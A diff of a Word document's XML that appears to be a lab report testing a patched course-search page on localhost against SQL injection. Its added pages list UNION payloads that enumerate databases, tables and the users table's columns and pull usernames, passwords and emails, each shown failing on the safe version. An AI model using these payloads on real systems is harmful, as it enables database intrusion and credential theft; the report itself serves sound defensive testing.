@@ -7783,31 +7992,31 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:52.892Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/safe/courses?q=%27+UNION+SELECT+username%2Cpassword%2Cemail+FROM+users+--+</w:t>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:21.349Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/safe/courses?q=%27+UNION+SELECT+%27DATABASE%27%2Cname%2Cfile+FROM+pragma_database_list+--+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7832,7 +8041,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="4819FA2C">
+        <w:pict w14:anchorId="40186AD4">
           <v:shape id="_x0000_i1061" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId39" o:title=""/>
           </v:shape>
@@ -7861,7 +8070,760 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 41 of 41</w:t>
+        <w:t>Page 42 of 46</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Safe Version Sql Injection Advanced Tables</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT 'TABLE',name,sql FROM sqlite_master WHERE type='table' -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Literal search input; no injected rows.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:21.929Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/safe/courses?q=%27+UNION+SELECT+%27TABLE%27%2Cname%2Csql+FROM+sqlite_master+WHERE+type%3D%27table%27+--+</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:pict w14:anchorId="03C70DFA">
+          <v:shape id="_x0000_i1062" type="#_x0000_t75" style="width:495pt;height:344.25pt">
+            <v:imagedata r:id="rId40" o:title=""/>
+          </v:shape>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="right"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Page 43 of 46</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Safe Version Sql Injection Advanced Columns</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: ' UNI</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ON SELECT 'COLUMN',name,type FROM pragma_table_info('users') -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Literal search input; no injected rows.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:22.556Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/safe/courses?q=%27+UNION+SELECT+%27COLUMN%27%2Cname%2Ctype+FROM+pragma_table_info%28%27users%27%29+--+</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:pict w14:anchorId="066FE3D3">
+          <v:shape id="_x0000_i1063" type="#_x0000_t75" style="width:495pt;height:344.25pt">
+            <v:imagedata r:id="rId41" o:title=""/>
+          </v:shape>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="right"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Page 44 of 46</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Safe Version Sql Injection Advanced Credentials</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT username,password,email FROM users -- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Literal search input; no injected rows.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:23.135Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/safe/courses?q=%27+UNION+SELECT+username%2Cpassword%2Cemail+FROM+users+--+</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:pict w14:anchorId="0D83CB61">
+          <v:shape id="_x0000_i1064" type="#_x0000_t75" style="width:495pt;height:344.25pt">
+            <v:imagedata r:id="rId42" o:title=""/>
+          </v:shape>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="right"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Page 45 of 46</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Safe Version Normal Search</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: Information</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Legitimate course search still returns Information Security.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:23.787Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/safe/courses?q=Information</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:pict w14:anchorId="141E04C9">
+          <v:shape id="_x0000_i1065" type="#_x0000_t75" style="width:495pt;height:344.25pt">
+            <v:imagedata r:id="rId43" o:title=""/>
+          </v:shape>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="right"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
